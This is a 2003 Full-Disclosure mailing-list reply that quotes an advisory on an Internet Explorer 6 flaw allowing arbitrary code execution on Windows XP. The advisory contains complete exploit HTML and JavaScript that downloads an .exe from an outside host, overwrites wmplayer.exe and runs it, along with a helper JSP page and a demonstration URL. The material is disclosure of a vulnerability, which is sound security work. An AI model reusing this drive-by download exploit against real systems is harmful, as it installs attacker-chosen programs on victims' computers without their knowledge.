Same problem occurs on windows 2000 and windows 2003 server... Greetings,
Dj MegaWorld / Marius van Witzenburg "It's the music... That never fades!" Url: http://www.djmegaworld.nl/ ----- Original Message ----- From: "jelmer" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Friday, September 12, 2003 0:31 Subject: Internet explorer 6 on windows XP allows exection of arbitrary code > Internet explorer 6 on windows XP allows exection of arbitrary code > > DESCRIPTION : > > Yesterday Liu Die Yu released a number series of advisories concerning > internet explorer > by combining on of these issues with an earlier issue I myself reported a > while back > You can construct a specially crafted webpage that can take any action on a > users system > including but not limited to, installing trojans, keyloggers, wiping the > users harddrive etc. > > > TECHNICAL EXPLAINATION : > > Internet explorer 6 comes with a media sidebar in wich you can load and play > mediaclips > without even leaving the browser. when you instruct the mediabar to load a > file from an > unknown host or the HTTP status returned by an existing host indicates an > error > this media bar displays an error page inside the media bar namely > > res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path > > res URL's are treated as being in the "my computer zone" and are loaded from > the users filesystem > perfect conditions for the issue I describe on > > http://www.mail-archive.com/[EMAIL PROTECTED]/msg06791.html > > To work. now all that is needed is a way to inject this exploit code into > this page > This method was graciously provided by Liu Die Yu as you can read on > > http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0 > > Combining these issues we get something like : > > --snip-- > > <textarea id="code" style="display:none;"> > > var x = new ActiveXObject("Microsoft.XMLHTTP"); > x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0); > x.Send(); > > var s = new ActiveXObject("ADODB.Stream"); > s.Mode = 3; > s.Type = 1; > s.Open(); > s.Write(x.responseBody); > > s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); > location.href = "mms://"; > > </textarea> > > <script language="javascript"> > > function preparecode(code) { > result = ''; > lines = code.split(/\r\n/); > for (i=0;i<lines.length;i++) { > > line = lines[i]; > line = line.replace(/^\s+/,""); > line = line.replace(/\s+$/,""); > line = line.replace(/'/g,"\\'"); > line = line.replace(/[\\]/g,"\\\\"); > line = line.replace(/[/]/g,"%2f"); > > if (line != '') { > result += line +'\\r\\n'; > } > } > return result; > } > > function doit() { > mycode = preparecode(document.all.code.value); > myURL = "file:javascript:eval('" + mycode + "')"; > window.open(myURL,"_media") > } > > > window.open("error.jsp","_media"); > > setTimeout("doit()", 5000); > > > </script> > > --snip-- > > error.jsp is a jsp page that consists of one line, namely > > <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %> > > > DEMONSTRATION : > > A demonstration is provided at : > > http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm > > > WORKAROUND : > > Disable active scripting or do "the sensible thing" and pick another browser > such as the > excellent mozilla firebird. > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
